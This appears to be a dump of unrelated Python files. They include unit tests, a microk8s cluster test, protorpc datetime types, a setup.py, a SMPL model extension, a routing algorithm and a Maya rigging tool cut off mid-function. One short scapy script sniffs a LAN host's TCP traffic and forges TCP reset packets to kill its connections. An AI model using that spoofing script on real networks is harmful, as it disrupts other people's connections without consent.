self.assertEqual(fact.base_url, 'http://abc.com')
self.assertEqual(fact.set_task_state(task_id='TID'), 'http://abc.com/tasks/TID')
# Initialize from class loader
fact = TaskUrlFactory(
base_url='http://abc.com/////',
properties={PROPERTIES_BASEURL: 'XYZ'}
)
self.assertEqual(fact.base_url, 'XYZ')
# Value error is no url factory is given
with self.assertRaises(ValueError):
TaskUrlFactory()
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
#
# Copyright 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Simple protocol message types.
Includes new message and field types that are outside what is defined by the
protocol buffers standard.
"""
__author__ = 'rafek@google.com (Rafe Kaplan)'
import datetime
from . import messages
from . import util
__all__ = [
'DateTimeField',
'DateTimeMessage',
'VoidMessage',
]
class VoidMessage(messages.Message):
"""Empty message."""
class DateTimeMessage(messages.Message):
"""Message to store/transmit a DateTime.
Fields:
milliseconds: Milliseconds since Jan 1st 1970 local time.
time_zone_offset: Optional time zone offset, in minutes from UTC.
"""
milliseconds = messages.IntegerField(1, required=True)
time_zone_offset = messages.IntegerField(2)
class DateTimeField(messages.MessageField):
"""Field definition for datetime values.
Stores a python datetime object as a field. If time zone information is
included in the datetime object, it will be included in
the encoded data when this is encoded/decoded.
"""
type = datetime.datetime
message_type = DateTimeMessage
@util.positional(3)
def __init__(self,
number,
**kwargs):
super(DateTimeField, self).__init__(self.message_type,
number,
**kwargs)
def value_from_message(self, message):
"""Convert DateTimeMessage to a datetime.
Args:
A DateTimeMessage instance.
Returns:
A datetime instance.
"""
message = super(DateTimeField, self).value_from_message(message)
if message.time_zone_offset is None:
return datetime.datetime.utcfromtimestamp(message.milliseconds / 1000.0)
# Need to subtract the time zone offset, because when we call
# datetime.fromtimestamp, it will add the time zone offset to the
# value we pass.
milliseconds = (message.milliseconds -
60000 * message.time_zone_offset)
timezone = util.TimeZoneOffset(message.time_zone_offset)
return datetime.datetime.fromtimestamp(milliseconds / 1000.0,
tz=timezone)
def value_to_message(self, value):
value = super(DateTimeField, self).value_to_message(value)
# First, determine the delta from the epoch, so we can fill in
# DateTimeMessage's milliseconds field.
if value.tzinfo is None:
time_zone_offset = 0
local_epoch = datetime.datetime.utcfromtimestamp(0)
else:
time_zone_offset = util.total_seconds(value.tzinfo.utcoffset(value))
# Determine Jan 1, 1970 local time.
local_epoch = datetime.datetime.fromtimestamp(-time_zone_offset,
tz=value.tzinfo)
delta = value - local_epoch
# Create and fill in the DateTimeMessage, including time zone if
# one was specified.
message = DateTimeMessage()
message.milliseconds = int(util.total_seconds(delta) * 1000)
if value.tzinfo is not None:
utc_offset = value.tzinfo.utcoffset(value)
if utc_offset is not None:
message.time_zone_offset = int(
util.total_seconds(value.tzinfo.utcoffset(value)) / 60)
return message
|
import string
import random
import time
import pytest
import os
import subprocess
from os import path
# Provide a list of VMs you want to reuse. VMs should have already microk8s installed.
# the test will attempt a refresh to the channel requested for testing
# reuse_vms = ['vm-ldzcjb', 'vm-nfpgea', 'vm-pkgbtw']
reuse_vms = None
channel_to_test = os.environ.get("CHANNEL_TO_TEST", "edge/ha-preview")
backend = os.environ.get("BACKEND", None)
class VM:
"""
This class abstracts the backend we are using. It could be either multipass or lxc.
"""
def __init__(self, attach_vm=None):
"""Detect the available backends and instantiate a VM.
If `attach_vm` is provided we just make sure the right MicroK8s is deployed.
:param attach_vm: the name of the VM we want to reuse
"""
rnd_letters = "".join(random.choice(string.ascii_lowercase) for i in range(6))
self.backend = "none"
self.vm_name = "vm-{}".format(rnd_letters)
if attach_vm:
self.vm_name = attach_vm
if path.exists("/snap/bin/multipass") or backend == "multipass":
print("Creating mulitpass VM")
self.backend = "multipass"
if not attach_vm:
subprocess.check_call(
"/snap/bin/multipass launch 18.04 -n {} -m 2G".format(self.vm_name).split()
)
subprocess.check_call(
"/snap/bin/multipass exec {} -- sudo "
"snap install microk8s --classic --channel {}".format(
self.vm_name, channel_to_test
).split()
)
else:
subprocess.check_call(
"/snap/bin/multipass exec {} -- sudo "
"snap refresh microk8s --channel {}".format(
self.vm_name, channel_to_test
).split()
)
elif path.exists("/snap/bin/lxc") or backend == "lxc":
self.backend = "lxc"
if not attach_vm:
profiles = subprocess.check_output("/snap/bin/lxc profile list".split())
if "microk8s" not in profiles.decode():
subprocess.check_call("/snap/bin/lxc profile copy default microk8s".split())
with open("lxc/microk8s-zfs.profile", "r+") as fp:
profile_string = fp.read()
process = subprocess.Popen(
"/snap/bin/lxc profile edit microk8s".split(),
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
)
process.stdin.write(profile_string.encode())
process.stdin.close()
subprocess.check_call(
"/snap/bin/lxc launch -p default -p microk8s ubuntu:18.04 {}".format(
self.vm_name
).split()
)
cmd_prefix = "/snap/bin/lxc exec {} -- script -e -c".format(self.vm_name).split()
cmd = ["snap install microk8s --classic --channel {}".format(channel_to_test)]
time.sleep(20)
subprocess.check_output(cmd_prefix + cmd)
else:
cmd = "/snap/bin/lxc exec {} -- ".format(self.vm_name).split()
cmd.append("sudo snap refresh microk8s --channel {}".format(channel_to_test))
subprocess.check_call(cmd)
else:
raise Exception("Need to install multipass of lxc")
def run(self, cmd):
"""
Run a command
:param cmd: the command we are running.
:return: the output of the command
"""
if self.backend == "multipass":
output = subprocess.check_output(
"/snap/bin/multipass exec {} -- sudo " "{}".format(self.vm_name, cmd).split()
)
return output
elif self.backend == "lxc":
cmd_prefix = "/snap/bin/lxc exec {} -- script -e -c ".format(self.vm_name).split()
output = subprocess.check_output(cmd_prefix + [cmd])
return output
else:
raise Exception("Not implemented for backend {}".format(self.backend))
def release(self):
"""
Release a VM.
"""
print("Destroying VM in {}".format(self.backend))
if self.backend == "multipass":
subprocess.check_call("/snap/bin/multipass stop {}".format(self.vm_name).split())
subprocess.check_call("/snap/bin/multipass delete {}".format(self.vm_name).split())
elif self.backend == "lxc":
subprocess.check_call("/snap/bin/lxc stop {}".format(self.vm_name).split())
subprocess.check_call("/snap/bin/lxc delete {}".format(self.vm_name).split())
class TestCluster(object):
@pytest.fixture(autouse=True, scope="module")
def setup_cluster(self):
"""
Provision VMs and for a cluster.
:return:
"""
try:
print("Setting up cluster")
type(self).VM = []
if not reuse_vms:
size = 3
for i in range(0, size):
print("Creating machine {}".format(i))
vm = VM()
print("Waiting for machine {}".format(i))
vm.run("/snap/bin/microk8s.status --wait-ready --timeout 120")
self.VM.append(vm)
else:
for vm_name in reuse_vms:
self.VM.append(VM(vm_name))
# Form cluster
vm_master = self.VM[0]
connected_nodes = vm_master.run("/snap/bin/microk8s.kubectl get no")
for vm in self.VM:
if vm.vm_name in connected_nodes.decode():
continue
else:
print("Adding machine {} to cluster".format(vm.vm_name))
add_node = vm_master.run("/snap/bin/microk8s.add-node")
endpoint = [ep for ep in add_node.decode().split() if ":25000/" in ep]
vm.run("/snap/bin/microk8s.join {}".format(endpoint[0]))
# Wait for nodes to be ready
print("Waiting for nodes to register")
connected_nodes = vm_master.run("/snap/bin/microk8s.kubectl get no")
while "NotReady" in connected_nodes.decode():
time.sleep(5)
connected_nodes = vm_master.run("/snap/bin/microk8s.kubectl get no")
print(connected_nodes.decode())
# Wait for CNI pods
print("Waiting for cni")
while True:
ready_pods = 0
pods = vm_master.run("/snap/bin/microk8s.kubectl get po -n kube-system -o wide")
for line in pods.decode().splitlines():
if "calico" in line and "Running" in line:
ready_pods += 1
if ready_pods == (len(self.VM) + 1):
print(pods.decode())
break
time.sleep(5)
yield
finally:
print("Cleanup up cluster")
if not reuse_vms:
for vm in self.VM:
print("Releasing machine {} in {}".format(vm.vm_name, vm.backend))
vm.release()
def test_calico_in_nodes(self):
"""
Test each node has a calico pod.
"""
print("Checking calico is in all nodes")
pods = self.VM[0].run("/snap/bin/microk8s.kubectl get po -n kube-system -o wide")
for vm in self.VM:
if vm.vm_name not in pods.decode():
assert False
print("Calico found in node {}".format(vm.vm_name))
def test_nodes_in_ha(self):
"""
Test all nodes are seeing the database while removing nodes
"""
# All nodes see the same pods
for vm in self.VM:
pods = vm.run("/snap/bin/microk8s.kubectl get po -n kube-system -o wide")
for other_vm in self.VM:
if other_vm.vm_name not in pods.decode():
assert False
print("All nodes see the same pods")
attempt = 100
while True:
assert attempt > 0
for vm in self.VM:
status = vm.run("/snap/bin/microk8s.status")
if "high-availability: yes" not in status.decode():
attempt += 1
continue
break
# remove a node
print("Removing machine {}".format(self.VM[0].vm_name))
self.VM[0].run("/snap/bin/microk8s.leave")
self.VM[1].run("/snap/bin/microk8s.remove-node {}".format(self.VM[0].vm_name))
# allow for some time for the leader to hand over leadership
time.sleep(10)
attempt = 100
while True:
ready_pods = 0
pods = self.VM[1].run("/snap/bin/microk8s.kubectl get po -n kube-system -o wide")
for line in pods.decode().splitlines():
if "calico" in line and "Running" in line:
ready_pods += 1
if ready_pods == (len(self.VM)):
print(pods.decode())
break
attempt -= 1
if attempt <= 0:
assert False
time.sleep(5)
print("Checking calico is on the nodes running")
leftVMs = [self.VM[1], self.VM[2]]
attempt = 100
while True:
assert attempt > 0
for vm in leftVMs:
status = vm.run("/snap/bin/microk8s.status")
if "high-availability: no" not in status.decode():
attempt += 1
time.sleep(2)
continue
break
for vm in leftVMs:
pods = vm.run("/snap/bin/microk8s.kubectl get po -n kube-system -o wide")
for other_vm in leftVMs:
if other_vm.vm_name not in pods.decode():
time.sleep(2)
assert False
print("Remaining nodes see the same pods")
print("Waiting for two ingress to appear")
self.VM[1].run("/snap/bin/microk8s.enable ingress")
# wait for two ingress to appear
time.sleep(10)
attempt = 100
while True:
ready_pods = 0
pods = self.VM[1].run("/snap/bin/microk8s.kubectl get po -A -o wide")
for line in pods.decode().splitlines():
if "ingress" in line and "Running" in line:
ready_pods += 1
if ready_pods == (len(self.VM) - 1):
print(pods.decode())
break
attempt -= 1
if attempt <= 0:
assert False
time.sleep(5)
print("Rejoin the node")
add_node = self.VM[1].run("/snap/bin/microk8s.add-node")
endpoint = [ep for ep in add_node.decode().split() if ":25000/" in ep]
self.VM[0].run("/snap/bin/microk8s.join {}".format(endpoint[0]))
print("Waiting for nodes to be ready")
connected_nodes = self.VM[0].run("/snap/bin/microk8s.kubectl get no")
while "NotReady" in connected_nodes.decode():
time.sleep(5)
connected_nodes = self.VM[0].run("/snap/bin/microk8s.kubectl get no")
attempt = 100
while True:
assert attempt > 0
for vm in self.VM:
status = vm.run("/snap/bin/microk8s.status")
if "high-availability: yes" not in status.decode():
attempt += 1
time.sleep(2)
continue
break
|
# Copyright 2009-2017 Ram Rachum.
# This program is distributed under the MIT license.
'''A package for doing a binary search in a sequence.'''
from .roundings import (Rounding, LOW, LOW_IF_BOTH, LOW_OTHERWISE_HIGH, HIGH,
HIGH_IF_BOTH, HIGH_OTHERWISE_LOW, EXACT, CLOSEST,
CLOSEST_IF_BOTH, BOTH)
from .functions import (binary_search, binary_search_by_index,
make_both_data_into_preferred_rounding)
from .binary_search_profile import BinarySearchProfile
|
# -*- coding: utf-8 -*-
"""Packaging logic for beem."""
import codecs
import io
import os
import sys
from setuptools import setup
# Work around mbcs bug in distutils.
# http://bugs.python.org/issue10945
try:
codecs.lookup('mbcs')
except LookupError:
ascii = codecs.lookup('ascii')
codecs.register(lambda name, enc=ascii: {True: enc}.get(name == 'mbcs'))
VERSION = '0.1.2'
tests_require = ['mock >= 2.0.0', 'pytest', 'pytest-mock', 'parameterized']
requires = [
"beem",
"dataset",
"mysqlclient"
]
def write_version_py(filename):
"""Write version."""
cnt = """\"""THIS FILE IS GENERATED FROM beem SETUP.PY.\"""
version = '%(version)s'
"""
with open(filename, 'w') as a:
a.write(cnt % {'version': VERSION})
def get_long_description():
"""Generate a long description from the README file."""
descr = []
for fname in ('README.md',):
with io.open(fname, encoding='utf-8') as f:
descr.append(f.read())
return '\n\n'.join(descr)
if __name__ == '__main__':
# Rewrite the version file everytime
write_version_py('steembi/version.py')
setup(
name='steembi',
version=VERSION,
description='Steem basic income library',
long_description=get_long_description(),
download_url='https://github.com/holgern/steembasicincome/tarball/' + VERSION,
author='Holger Nahrstaedt',
author_email='holger@nahrstaedt.de',
maintainer='Holger Nahrstaedt',
maintainer_email='holger@nahrstaedt.de',
url='http://www.github.com/holgern/steembasicincome',
keywords=['steem', 'library', 'ubi', 'steembasicincome'],
packages=[
"steembi"
],
classifiers=[
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: Office/Business :: Financial',
],
install_requires=requires,
entry_points={
},
setup_requires=['pytest-runner'],
tests_require=tests_require,
include_package_data=True,
)
|
import logging
from email.utils import parseaddr
logger = logging.getLogger('c7n_mailer.utils.email')
def is_email(target):
if target.startswith('slack://'):
logger.debug("Slack payload, not an email.")
return False
if parseaddr(target)[1] and '@' in target and '.' in target:
return True
else:
return False
|
import torch
import numpy as np
import smplx
from smplx import SMPL as _SMPL
from smplx.body_models import ModelOutput
from smplx.lbs import vertices2joints
import spin.config as config
import spin.constants as constants
class SMPL(_SMPL):
""" Extension of the official SMPL implementation to support more joints """
def __init__(self, *args, **kwargs):
super(SMPL, self).__init__(*args, **kwargs)
joints = [constants.JOINT_MAP[i] for i in constants.JOINT_NAMES]
J_regressor_extra = np.load(config.JOINT_REGRESSOR_TRAIN_EXTRA)
self.register_buffer('J_regressor_extra', torch.tensor(J_regressor_extra, dtype=torch.float32))
self.joint_map = torch.tensor(joints, dtype=torch.long)
def forward(self, *args, **kwargs):
kwargs['get_skin'] = True
smpl_output = super(SMPL, self).forward(*args, **kwargs)
extra_joints = vertices2joints(self.J_regressor_extra, smpl_output.vertices)
joints = torch.cat([smpl_output.joints, extra_joints], dim=1)
joints = smpl_output.joints
# print(smpl_output.joints.shape)
# joints = joints[:, self.joint_map, :]
output = ModelOutput(vertices=smpl_output.vertices,
global_orient=smpl_output.global_orient,
body_pose=smpl_output.body_pose,
joints=joints,
betas=smpl_output.betas,
full_pose=smpl_output.full_pose)
return output
|
from scapy.all import *
from scapy.all import send
from scapy.layers.inet import *
srcIP = "192.168.0.103"
destIP = "192.168.0.108"
def spoof_tcp(pkt):
IPLayer = IP(dst=destIP, src=pkt[IP].dst)
TCPLayer = TCP(flags="R", seq=pkt[TCP].ack, dport=pkt[TCP].sport, sport=pkt[TCP].dport)
spoofpkt = IPLayer/TCPLayer
send(spoofpkt, verbose=1)
print("Spoofed Packet Sent...")
while 1 > 0:
pkt = sniff(filter="tcp and src host " + destIP)
print("Found Packet")
print(pkt)
# spoof_tcp(pkt)
|
#Attempt to route using the Joswig Algorithm described here: https://arxiv.org/pdf/1904.01082.pdf
#using object oriented programming.
class Vertex:
num_vert = 0
vertices = []
def __init__(self, lab=""):
self.label = lab
self.adj = [] #adjacency list
self.weight = [] #weights associated to adjacency list edges
self.known = False #shortest path to self is known
self.pv = None #previous node in shortest path tree
self.dv = 0 #current distance on best known path
self.help = False #helper boolean denoting if a vertex has had dv changed from 0.
Vertex.num_vert += 1
Vertex.vertices.append(self)
#links self to vert with weight cost
def link(self,vert,cost):
if((vert in self.adj) == False):
self.adj.append(vert)
self.weight.append(cost)
def editlink(self,vert,cost):
if((vert in self.adj) == True):
self.weight[self.adj.index(vert)] = cost
def clear(self):
Vertex.num_vert = 0
Vertex.vertices = []
def printadj(self,lab):
for v in self.adj:
result = v.label,v.dv
if(lab == True):
result = v.label,v.pv.label,v.dv
print(result)
#reset vertex boolean values
#must be called before
def vert_false(self):
for v in Vertex.vertices:
v.known = False
v.dv = 0
v.pv = None
v.help = False
def shortestpath(self):
num_edge = 0
if(self.adj != []):
num_edge = len(self.adj)
self.known = True
if(num_edge > 0):
for i in range(0,num_edge):
weight = self.weight[i]
if(weight == -1):
weight = 0
if((self.adj[i].help == False) | (self.adj[i].dv > weight + self.dv)):
self.adj[i].dv = weight + self.dv
self.adj[i].pv = self
self.adj[i].help = True
min = -1
next = None
done = True
for v in Vertex.vertices:
if(v.known == False):
done = False
if(v.help == True):
if((min == -1) | (min > v.dv)):
min = v.dv
next = v
if(done == False):
if(next != None):
next.shortestpath()
class Tree:
num_trees = 0
trees = []
def __init__(self,numvert):
self.vertices = []
for i in range(0,numvert):
self.vertices.append(Vertex("v"+str(i+1)))
Tree.num_trees += 1
Tree.trees.append(self)
def link(self,init,final,weight):
numvert = len(self.vertices)
init = init-1
final = final-1
if((init < numvert) & (final < numvert)):
self.vertices[init].link(self.vertices[final],weight)
def editlink(self,init,final,newweight):
numvert = len(self.vertices)
init = init - 1
final = final - 1
if ((init < numvert) & (final < numvert)):
self.vertices[init].editlink(self.vertices[final],newweight)
def shortestpath(self,vert):
self.vertices[vert-1].shortestpath()
result = []
for x in self.vertices[vert-1].adj:
result.append([x.label,x.pv.label,x.dv])
return result
def add_vertex(self,vert):
self.vertices.append(vert)
def vert_false(self):
self.vertices[0].vert_false()
def printadj(self,vert,lab):
self.vertices[vert-1].printadj(lab)
|
'''
I N S T A L L A T I O N::
Step 1:
Copy "no_flip_pole_vector_tool.py" to your Maya plugins directory.
Windows: C:\Users\UserName\Documents\maya\scripts
Step 2:
Run this in the Maya's Script Editor under the Python tab...
import no_flip_pole_vector_tool as nfpv
nfpv.No_Flip_Pole_Vector().show_ui()
If you have any problems email me at Nicholas.Silveira@gmail.com
'''
import sys
import functools
import maya.cmds as cmds
import maya.OpenMaya as OpenMaya
VERSION = 1.0
'''
========================================================================
----> No Flip Pole Vector <----
========================================================================
'''
class No_Flip_Pole_Vector():
"""
*Examples:* ::
import no_flip_pole_vector_tool as nfpv
# Show ui
nfpv.No_Flip_Pole_Vector().show_ui()
*Author:*
* nicholas.silveira, Nicholas.Silveira@gmail.com, Jun 13, 2013 8:53:53 AM
"""
'''
========================================================================
----> Shows No Flip Pole Vector ui <----
========================================================================
'''
def show_ui( self ):
"""
*Examples:* ::
import no_flip_pole_vector_tool as nfpv
# Show ui
nfpv.No_Flip_Pole_Vector().show_ui()
"""
if cmds.window( 'no_flip_pole_vector_window', exists = True, q = True ):
cmds.deleteUI( 'no_flip_pole_vector_window' )
self.no_flip_pole_vector_ui()
'''
========================================================================
----> No Flip Pole Vector ui <----
========================================================================
'''
def no_flip_pole_vector_ui( self ):
self.root_joint = None
self.controller = None
self.pole_vector = None
window = cmds.window( 'no_flip_pole_vector_window', title = 'No Flip Pole Vector {0}'.format( VERSION ), menuBar = True )
cmds.menu( label = 'Help' )
cmds.menuItem( 'sample"', label = 'Build Sample', c = self.sample )
cmds.menuItem( 'code_sample"', label = 'Code Sample', c = self.code_sample )
cmds.menuItem( 'about"', label = 'About No Flip Pole Vector', c = self.about )
cmds.columnLayout()
cmds.rowColumnLayout ( nc = 2, columnWidth = [( 1, 100 ), ( 2, 200 )] )
cmds.text( label = 'Name: ', align = 'right' )
self.name_text = cmds.textField()
cmds.setParent( '..' )
cmds.rowColumnLayout ( nc = 1, columnWidth = ( 1, 300 ) )
cmds.separator( height = 20, style = 'in' )
cmds.rowColumnLayout ( nc = 2, columnWidth = [( 1, 100 ), ( 2, 200 )] )
cmds.button( label = 'Root Joint', c = functools.partial( self.set_text_field, 'root_joint' ) )
self.root_joint_text = cmds.textField()
cmds.button( label = 'Controller', c = functools.partial( self.set_text_field, 'controller' ) )
self.controller_text = cmds.textField()
cmds.button( label = 'Pole Vector', c = functools.partial( self.set_text_field, 'pole_vector' ) )
self.pole_vector_text = cmds.textField()
cmds.setParent( '..' )
cmds.rowColumnLayout ( nc = 1, columnWidth = ( 1, 300 ) )
cmds.separator( height = 20, style = 'in' )
cmds.button( label = 'Build No Flip Pole Vector', c = self.run_setup )
cmds.showWindow( window )
'''
========================================================================
----> Set Maya ui text field <----
========================================================================
'''
def set_text_field( self, text_field_name, *args ):
"""
*Arguments:*
* ``text_field_name`` Pass a text field name that will take on the selected objects name.
*Examples:* ::
import pymel.core
import no_flip_pole_vector_tool as nfpv
reload( nfpv )
# Show ui
no_flip_pole_vector_tool = nfpv.No_Flip_Pole_Vector()
no_flip_pole_vector.show_ui()
# Create locator
cmds.spaceLocator()
# Add selected to text field
no_flip_pole_vector.set_text_field('controller')
"""
objs = cmds.ls( sl = True )
if len( objs ) == 1:
obj_name = objs[0].split( '|' )[-1]
obj_dag = DAG_Node( cmds.ls( sl = True )[0] )
if text_field_name == 'root_joint':
self.root_joint = obj_dag
cmds.textField( self.root_joint_text, edit = True, text = obj_name )
elif text_field_name == 'controller':
self.controller = obj_dag
cmds.textField( self.controller_text, edit = True, text = obj_name )
elif text_field_name == 'pole_vector':
self.pole_vector = obj_dag
cmds.textField( self.pole_vector_text, edit = True, text = obj_name )
elif len( objs ) >= 1:
OpenMaya.MGlobal.displayError( "There are to many objects selected!" )
elif len( objs ) <= 1:
OpenMaya.MGlobal.displayError( "There are no objects selected!" )
'''
========================================================================
----> Run Setup gets ui data and runs build <----
========================================================================
'''
def run_setup( self, *args ):
self.name = cmds.textField( self.name_text, text = True, q = True )
if self.root_joint:
self.root_joint = self.root_joint.name()
if self.controller:
self.controller = self.controller.name()
if self.pole_vector:
self.pole_vector = self.pole_vector.name()
self.build( root_joint = self.root_joint,
controller = self.controller,
pole_vector = self.pole_vector,
name = self.name )
'''
========================================================================
----> Builds No Flip Pole Vector <----
========================================================================
'''
def build( self, root_joint = None, controller = None, pole_vector = None, name = '', *args ):
"""
*Keyword Arguments:*
* ``root_joint`` Pass the top of the joint chain.
* ``controller`` Pass the main controller.
* ``pole_vector`` Pass the pole vector controller.
* ``name`` Add prefix to all created nodes
*Returns:*
* ``True`` If process finishes.
*Examples:* ::
import pymel.core
import no_flip_pole_vector_tool as nfpv
reload( nfpv )
# Build example rig
# Build joint chain
cmds.select( cl = True )
chain1_jnt = cmds.joint( n = 'chain1_jnt', p = [0, 6, 0] )
chain2_jnt = cmds.joint( n = 'chain2_jnt', p = [0, 3, 1] )
chain3_jnt = cmds.joint( n = 'chain3_jnt', p = [0, 0, 0] )
# Build ikHandle
cmds.ikHandle ( n = 'chain_ikHandle', startJoint = chain1_jnt, endEffector = chain3_jnt, sol = 'ikRPsolver' )
chain_ikHandle = cmds.selected()[0]
# Build pole vector
pole_vector_loc = cmds.spaceLocator()
pole_vector_loc.rename( 'pole_vector_loc' )
pole_vector_loc.translateY.set( 3 )
pole_vector_loc.translateZ.set( 2 )
cmds.poleVectorConstraint( pole_vector_loc, chain_ikHandle )
# Build controller
controller = cmds.circle ( nr = [0, 1, 0], r = 1 )[0]
cmds.pointConstraint( controller, chain_ikHandle )
# Standalone code
nfpv.No_Flip_Pole_Vector().build( root_joint = chain1_jnt, controller = controller, pole_vector = pole_vector_loc, name = 'example' )
"""
if root_joint == None or controller == None or pole_vector == None:
get_selected_objs = cmds.ls( sl = True )
if len( get_selected_objs ) == 3:
root_joint = DAG_Node( get_selected_objs[0] )
controller = DAG_Node( get_selected_objs[1] )
pole_vector = DAG_Node( get_selected_objs[2] )
elif len( get_selected_objs ) >= 3:
OpenMaya.MGlobal.displayError( "There more than 3 objects selected!" )
return False
elif len( get_selected_objs ) <= 3:
OpenMaya.MGlobal.displayError( "There less than 3 objects selected!" )
return False
else:
root_joint = DAG_Node( root_joint )
controller = DAG_Node( controller )
pole_vector = DAG_Node( pole_vector )
cmds.select( cl = True )
# Get pole vector parent
pole_parent = pole_vector.parent()
# Create pole main grp
self.pole_main_grp = DAG_Node( cmds.group( n = '{0}_poleMain_grp'.format( name ), em = True ) )
# Create pole parent grp
pole_parent_grp = DAG_Node( cmds.group( n = '{0}_poleParent_grp'.format( name ), em = True ) )
if pole_parent:
pole_parent_grp.set_parent( pole_parent )
controller_pivot = cmds.xform( controller.name(), ws = True, rp = True, q = True )
controller_rotation = cmds.xform( controller.name(), ws = True, rotation = True, q = True )
cmds.xform( pole_parent_grp.name(), translation = controller_pivot, ws = True )
cmds.xform( pole_parent_grp.name(), rotation = controller_rotation, ws = True )
pole_vector.set_parent( pole_parent_grp )
# Create pole world grp
pole_world_grp = DAG_Node( cmds.group( n = '{0}_poleWorld_grp'.format( name ), em = True ) )
pole_world_grp.set_parent( self.pole_main_grp )
cmds.xform( pole_world_grp.name(), translation = controller_pivot, ws = True )
cmds.xform( pole_world_grp.name(), rotation = controller_rotation, ws = True )
# Object up vector
up_vector_grp = DAG_Node( cmds.group( n = '{0}_upVector_grp'.format( name ), em = True ) )
up_vector_grp.set_parent( self.pole_main_grp )
cmds.pointConstraint( root_joint.name() , up_vector_grp.name() )
# Create bottom chain aim locator
aim_grp = DAG_Node( cmds.group( n = '{0}_aim_grp'.format( name ), em = True ) )
aim_grp.set_parent( self.pole_main_grp )
cmds.aimConstraint ( root_joint.name(), aim_grp.name(),
aimVector = [1, 0, 0],
upVector = [0, 1, 0],
worldUpType = "objectrotation",
worldUpVector = [-1, 0, 0],
worldUpObject = up_vector_grp.name() )
cmds.pointConstraint( controller.name(), aim_grp.name() )
# Create pole vector parent groups
pole_controller_grp = DAG_Node( cmds.group( n = '{0}_poleController_grp'.format( name ), em = True ) )
pole_rotate_grp = DAG_Node( cmds.group( n = '{0}_poleRotate_grp'.format( name ), em = True ) )
pole_rotate_grp.set_parent( pole_controller_grp )
pole_controller_grp.set_parent( aim_grp )
# Set controller orientation on main pole group
cmds.xform( pole_controller_grp.name(), translation = controller_pivot, ws = True )
cmds.xform( pole_controller_grp.name(), rotation = controller_rotation, ws = True )
# Connect rotate group's rotation Y,Z for twist follow
cmds.connectAttr( '{0}.rotateY'.format( controller.name() ), '{0}.rotateY'.format( pole_rotate_grp.name() ) )
cmds.connectAttr( '{0}.rotateZ'.format( controller.name() ), '{0}.rotateZ'.format( pole_rotate_grp.name() ) )
# Create and attach new custom attribute
position_follow_str = 'position_follow'
rotation_follow_str = 'rotation_follow'
if not cmds.objExists( '{0}.{1}'.format( pole_vector.name(), position_follow_str ) ):
cmds.addAttr( pole_vector.name(), longName = position_follow_str, attributeType = 'double', min = 0, max = 1, k = True )
if not cmds.objExists( '{0}.{1}'.format( pole_vector.name(), rotation_follow_str ) ):
cmds.addAttr( pole_vector.name(), longName = rotation_follow_str, attributeType = 'double', min = 0, max = 1, k = True )
cmds.setAttr( '{0}.{1}'.format( pole_vector.name(), position_follow_str ), 1 )
cmds.setAttr( '{0}.{1}'.format( pole_vector.name(), rotation_follow_str ), 1 )
# Constraint pole parent to world and follow grps
point_constraint = DAG_Node( cmds.pointConstraint( pole_world_grp.name(), pole_rotate_grp.name(), pole_parent_grp.name() )[0] )
orient_constraint = DAG_Node( cmds.orientConstraint( pole_world_grp.name(), pole_rotate_grp.name(), pole_parent_grp.name() )[0] )
position_constraint_weights = cmds.pointConstraint( point_constraint.name(), weightAliasList = True, query = True )
rotation_constraint_weights = cmds.orientConstraint( orient_constraint.name(), weightAliasList = True, query = True )
cmds.connectAttr( '{0}.{1}'.format( pole_vector.name(), position_follow_str ), '{0}.{1}'.format( point_constraint.name(), position_constraint_weights[1] ) )
cmds.connectAttr( '{0}.{1}'.format( pole_vector.name(), rotation_follow_str ), '{0}.{1}'.format( orient_constraint.name(), rotation_constraint_weights[1] ) )
Maya_Util().reverse_node( parent_attr = '{0}.{1}'.format( pole_vector.name(), position_follow_str ),
child_attr = '{0}.{1}'.format( point_constraint.name(), position_constraint_weights[0] ),
node_name = '{0}_positionFollow_node'.format( name ) )
Maya_Util().reverse_node( parent_attr = '{0}.{1}'.format( pole_vector.name(), rotation_follow_str ),
child_attr = '{0}.{1}'.format( orient_constraint.name(), rotation_constraint_weights[0] ),
node_name = '{0}_rotationFollow_node'.format( name ) )
cmds.select( cl = True )
sys.stdout.write( '// Result: No FLip Pole Vector is finished!' )
return True
'''
========================================================================
----> Build Rig Sample <----
========================================================================
'''
def sample( self, *args ):
# Build joint chain
cmds.select( cl = True )
chain1_jnt = cmds.joint( n = 'chain1_jnt', p = [0, 6, 0] )
cmds.joint( n = 'chain2_jnt', p = [0, 3, 1] )
chain3_jnt = cmds.joint( n = 'chain3_jnt', p = [0, 0, 0] )
# Build ikHandle
chain_ikHandle = cmds.ikHandle ( n = 'chain_ikHandle', startJoint = chain1_jnt, endEffector = chain3_jnt, sol = 'ikRPsolver' )[0]
# Build pole vector
pole_vector_loc = cmds.spaceLocator( n = 'pole_vector_loc' )[0]
cmds.setAttr( '{0}.translateY'.format( pole_vector_loc ), 3 )
cmds.setAttr( '{0}.translateZ'.format( pole_vector_loc ), 2 )
cmds.poleVectorConstraint( pole_vector_loc, chain_ikHandle )
# Build controller
controller = cmds.circle ( nr = [0, 1, 0], r = 1 )[0]
cmds.pointConstraint( controller, chain_ikHandle )
# Run Standalone code
No_Flip_Pole_Vector().build( root_joint = chain1_jnt, controller = controller, pole_vector = pole_vector_loc, name = 'example' )
'''
========================================================================
----> Code Sample <----
========================================================================
'''
def code_sample( self, *args ):
code = '''
import maya.cmds
import no_flip_pole_vector_tool as nfpv
# Show ui
nfpv.No_Flip_Pole_Vector().show_ui()
"""
========================================================================
----> Run Standalone code <----
========================================================================
"""
nfpv.No_Flip_Pole_Vector().build( root_joint = None, controller = None, pole_vector = None, name = 'example' )
'''
if cmds.window( 'code_sample_window', exists = True, q = True ):
cmds.deleteUI( 'code_sample_window' )
cmds.window( 'code_sample_window', title = 'Code Sample' )
cmds.paneLayout()
